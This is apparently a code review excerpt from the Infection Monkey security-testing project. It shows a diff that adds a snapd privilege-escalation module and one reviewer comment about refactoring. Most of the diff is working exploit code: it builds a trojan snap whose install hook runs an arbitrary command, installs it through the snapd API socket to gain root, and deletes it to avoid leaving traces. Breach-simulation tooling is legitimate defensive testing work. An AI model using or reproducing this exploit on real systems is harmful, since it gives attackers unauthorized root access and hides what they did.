monkey/infection_monkey/pe/actions/snapd.py

```diff
@@ -0,0 +1,300 @@
+
+    if 'HTTP/1.1 100 Continue' not in http_reply:
+        LOG.info("[!] Error starting POST conversation, here is the reply:\n")
+        # LOG.info(http_reply) debug output
+        return False
+
+    # Now we can send the payload
+    http_req2 = post_payload
+    client_sock.sendall(http_req2.encode("latin-1"))
+
+    # Receive the data and extract the JSON
+    http_reply = client_sock.recv(8192).decode("utf-8")
+
+    # Exit on failure
+    if 'status-code":202' not in http_reply:
+        LOG.info("[!] Did not work, here is the API reply:\n\n")
+        LOG.info(http_reply) #debug output
+        return False
+
+    # Sleep to allow time for the snap to install correctly. Otherwise,
+    # The uninstall that follows will fail, leaving unnecessary traces
+    # on the machine.
+
+    time.sleep(8)
+    return True
+
+
+def run_command_as_root(command):
+    """
+    This function takes in the command and runs them as root
+    if the pe is successful
+    :param command: Command to be run as root
+    :return: True if the Pe is successful
+    """
+    global TROJAN_BASE_SNAP
+    command = command + APPEND_COMMENT
+    index = 108 + len(command)
+    trojan_base_snap_decode = TROJAN_BASE_SNAP.decode('base64')
+
+    # Create a snap application with out command as the install hook
+    trojan_snap = base64.b64encode("".join(
+        (trojan_base_snap_decode[:108], command, trojan_base_snap_decode[index:])))
+
+    # Create a random name for the dirty socket file
+    sockfile = create_sockfile()
+
+    # Bind the dirty socket to the snapdapi
+    client_sock = bind_sock(sockfile)
+    if not client_sock:
+        return False
+
+    # Delete trojan snap, in case there was a previous install attempt
+    if not delete_snap(client_sock):
+        return False
+
+    # Install the trojan snap, which has an install hook that creates a user
+    if not install_snap(client_sock, trojan_snap):
+        return False
+
+    # Delete the trojan snap
+    if not delete_snap(client_sock):
+        return False
+
+    LOG.info("Command Executed Successfully \n")
+    return True
+
+
+class SnapdExploiter(HostPrivExploiter):
+    def __init__(self):
+        self.file_path = ""
+        self.file_name = ""
+        self.runnableDistro = ("ubuntu", "linux")
+
+    def try_priv_esc(self, command_line):
+        """
+        The function takes in the command line to run the monkey as an argument
+        and tries to run the monkey as a root user.
+        :param command_line: The command line to run the monkey in the format {dest_path  MONKEY_ARG  monkey_options}
+        :return: True if the pe is successful
+        """
+        # Check if the exploit can be tried on this distro
+        if not check_system(self.runnableDistro):
+            return False
+
+        self.file_path = command_line.split(' ')[0]
+        self.file_name = self.file_path.split('/')[-1]
+
+        # get the current user name
+        whoami = shell("whoami")
```

Comment:
I think this will be a very common action, so it should be exported to parent class